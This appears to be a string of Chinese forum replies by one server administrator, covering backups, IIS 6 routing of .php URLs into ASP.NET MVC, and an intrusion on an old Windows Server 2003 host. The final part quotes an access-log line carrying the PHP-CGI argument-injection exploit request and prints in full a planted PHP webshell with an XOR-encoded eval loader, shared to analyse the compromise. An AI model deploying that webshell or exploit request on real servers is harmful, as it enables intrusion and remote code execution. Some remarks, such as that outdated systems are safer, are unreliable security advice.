阿里还是很安全的，先做个快照备份，快照时间可以选择 3 天，到期自动删除，花费几角。

太多了，考虑删除没用的数据，压缩,用磁带备份，然后放到另外一个城市，间隔 100 公里以外，这个是异地备份的标准。

我用的是 ecs ，1CPU ，2G 内存，老配置，windows2003+sql server2008 ，大于二百万条数据后，果断分表，读写速度都在合理范围。

一直使用 postwoman ，还可以

想放心使用，那就使用三五年前的版本。时刻注意严重漏洞，无法打补丁的话，就要用防火墙。

@gbw1992
@jifengg
@lzzy1994
@ahswch
@ahswch
@skydcnmana
@ddup
@wellerman
@quan01994
@a33291
@Mithril
感谢大家的提出的宝贵意见，特别是 ddup 和 Mithril 。
最后解决了，是路由的问题，解决办法比较麻烦，windows2003 带的 iis 是 6.0 ，把网站 [属性] 里 [主目录] 的配置[映射]里加入.php,可执行文件填入 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll 。
这样 IIS 就认为 php 文件是一个自己要解析的文件了，自己写的 mvc 主程序里 Global.asax.cs 才会获取路由。
但是 IIS 版本和 visual studio 2010 的调试模式处理方式不同。
visual studio 2010 的调试模式下，只要在路由 routes.MapRoute 里"{controller}/{action}/{id}",改为"{controller}/{action}.php/{id}",就可以实现。
但是在 IIS 里不行，虽然获取到路由，但是不认，无法抛弃.php,只解析 action 。
后来在 Global.asax.cs 里加入 protected void Application_BeginRequest(object sender, EventArgs e)，里面使用 Request.Url.PathAndQuery 获取整个链接参数，
这里把.php 的 action 强制 HttpContext.Current.RewritePath ，特别神奇的是，无论是 Get 还是 POST 参数，都能完整地传递过去。
这里的坑是 vs2010 调试模式和 IIS 是不同的。
vs2010 使用.net 版本是 4.0,带的 mvc 版本是 2.0 ，本想升级一下 mvc 版本，因为想用 Razor ，后来怕又出现什么坑，就放弃了，使用默认的 aspx ，里面可以写 c#，还是很自由的。

@jifengg [HttpGet("def.php")]这样写，提示错误，错误是《“System.Web.Mvc.HttpGetAttribute”不包含采用“1”个参数的构造函数》，可能是 mvc 的版本比较低，操作系统比较老，这个版本几乎 c#能用的最高版本了，我改为[HttpGet] [Route("def.php")]也不行，提示 Route 缺少 using 指令或程序集引用。

@StoneHuLu 在 c#mvc 程序里定义 ActionResult def.php()，来模拟以前的 php 访问请求，这么定义是错误的，我不知道该如何弄，才能完全模拟出这个请求。

@gbw1992 好像不行，操作系统太老了

在 abcController 里无法定义 ActionResult def.php()，这么写是无法通过编译。https://imgur.com/a/ZoIfFQ3

为什么是两个 command ？一个程序 command 里打开串口，另一个程序 command 是无法再打开这个串口的，独占了，另一个程序也就无法写入数据了。另外一个程序写数据也要间隔多少毫秒再写吓一跳，Write 返回 void ，无法知道是否写成功了。

1 点,老婆在客厅收拾她的教材....12 点多才回家.... 1 点左右.老婆就还在洗.....楼主不会觉得自己没什么问题么？ 10 点前就睡觉，早点起床，试试

公版的 arm 架构的电源管理很糟糕，看看联发科的芯片就知道了。高通对 ARM 深度优化，让其芯片电源管理表现优秀，华为的麒麟对电源管理也非常优秀。

@redidea 好像还真是火绒的动作，我用 ProcessMonitor 监视了一下，强力删除后（普通模式删除不掉），开机后的确会重新产生，参数这些奇怪文件的进程是 system 。
动作是这样的
"当天时间","进程名称","PID","操作","路径","结果","详细"
"8:26:02.0763788","System","4","创建文件映射","C:\0package824\D7hhnTX.xls","成功","同步类型: 同步类型其它"
"8:26:02.0764087","System","4","FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION","C:\0package824\D7hhnTX.xls","成功",""
"8:26:02.0764246","System","4","写入文件","C:","成功","偏移: 0, 长度: 4,096, I/O 标记: 非缓存, 页面 I/O, 同步寻呼 I/O"
"8:26:02.0764500","System","4","设置文件结尾信息文件","C:","成功","文件结尾: 2,774"
"8:26:02.0764746","System","4","设置文件结尾信息文件","C:","成功","文件结尾: 2,601"
"8:26:02.0764956","System","4","创建文件映射","C:\0package824\2rYXhaobzW.sql","成功","同步类型: 同步类型其它"
"8:26:02.0765062","System","4","FASTIO_RELEASE_FOR_SECTION_SYNCHRONIZATION","C:\0package824\2rYXhaobzW.sql","成功",""
"8:26:02.0765193","System","4","写入文件","C:","成功","偏移: 0, 长度: 4,096, I/O 标记: 非缓存, 页面 I/O, 同步寻呼 I/O"

刚刚爆出 OpenSSH 爆高危漏洞 CVE-2024-6387 ，我的 CentOS 7 逃过一劫，相信你的也是，老系统不是轻易换的，我的 windows server2003 就逃过多少劫了。

@sampeng
@ShinichiYao
这个攻击，只要符合条件，1.中文操作系统，2.php 版本是最高的。这个是利用 php 的漏洞，处理%2d 字符的漏洞，是没法儿预防的，开了 80 或者 443 都可以攻击。如果 php 无法升级，暂时可以用 Rewrite 重定向处理，然后屏蔽掉 system,exec,shell_exec,passthru,popen 加固一下。

@Sw0rt1
@hgert
@ShinichiYao
@chf007
使用多款杀毒软件扫描过了，处理这些，还发现了一个被植入的挖矿程序.moneroocean ，从文件日期看，是十几天前，是不是我的系统太老了，导致其无法进一步捣乱。服务器存在的时间比较久，里面的数据有点多而且复杂，阿里云对 2003 也提供的充分的支持。如果是换成新的 windows 或者 linux ，是不是就容易中招了呢？！
服务器已经手动做了很多防护，针对远程桌面的攻击比较频繁，防护的方法除了改端口改用户名等，我还写了一个日志分析程序，如果遇到攻击远程桌面，会给发邮件，微信就会提醒。

攻击日志就像下面的，数量不多。
128.199.166.165 - - [08/Jun/2024:16:01:43 +0800] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 12
从日志看，apache 居然返回的 200 的成功标志？
我自己请求这个字符串时，返回的是 500 ，居然不是 404 。

@euph
@cnevil
@hefish
@wtks1
果然是，我在 web 根目录里发现个文件叫 Zq91u4b.php ，里面的内容就是有关 payload 的，暂时未发现服务器异常，可能是所有的程序都是自己写的原因，勒索软件暂时没有得逞，刚刚做了个快照，想想怎么完善一下，谢谢大家。那个 php 文件原文是这样的。
><?php
>@session_start();
>@set_time_limit(0);
>@error_reporting(0);
>function encode($D,$K){
> for($i=0;$i<strlen($D);$i++) {
> $c = $K[$i+1&15];
> $D[$i] = $D[$i]^$c;
> }
> return $D;
>}
>$pass='dddzzz';
>$payloadName='payload';
>$key='f25200d5d90fa403';
>if (isset($_POST[$pass])){
> $data=encode(base64_decode($_POST[$pass]),$key);
> if (isset($_SESSION[$payloadName])){
> $payload=encode($_SESSION[$payloadName],$key);
> if (strpos($payload,"getBasicsInfo")===false){
> $payload=encode($payload,$key);
> }
> eval($payload);
> echo substr(md5($pass.$key),0,16);
> echo base64_encode(encode(@run($data),$key));
> echo substr(md5($pass.$key),16);
> }else{
> if (strpos($data,"getBasicsInfo")!==false){
> $_SESSION[$payloadName]=encode($data,$key);
> }
> }
>}
>